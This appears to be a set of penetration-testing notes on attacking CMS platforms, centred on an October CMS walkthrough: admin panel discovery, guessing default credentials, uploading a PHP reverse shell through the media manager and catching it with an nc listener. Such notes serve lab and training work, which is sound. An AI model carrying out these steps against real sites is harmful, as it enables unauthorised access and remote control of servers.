# Content Management (CMS)

## Common

* [Wordpress](https://pentest.mxhx.org/04-webapps/03-webapp-wordpress)
* [Magento](https://pentest.mxhx.org/04-webapps/magento)

## Basics

* Analyze:
  * Version
  * Addons
  * Themes
  * Blog Posts
* Vulnerabilities
  * Start with Unauthenticated
* Backend Admin Panel
  * dirb, gobuster
  * Panel Finder: <https://github.com/s0md3v/Breacher>
  * Guess, Default Creds, Brute-Force

## October CMS

* Open source self-hosted CMS platform
* Based on the Laravel PHP
* Look for unauthenticated exploits:
  * searchsploit october
  * Found: Vulnerable Upload php5 (authenticated)
* Google: "Vanilla forum download"
* Admin Panel:
  * Google "october cms admin login"
  * dirb <http://10.x.x.x>
  * <http://10.x.x.x/**backend>\*\*
  * Try guessing: admin/admin
* Upload php5
  * October > Admin > Media > Upload > oct.php5
  * Execute has a button
  * Catch with nc reverse shell or msfconsole

```
> locate php-reverse-shell.php
> cp php-reverse-shell.php .
> vim php-reverse-shell.php
(upload through GUI/Webpage)
> nc -nvlp 4444
connected !!
```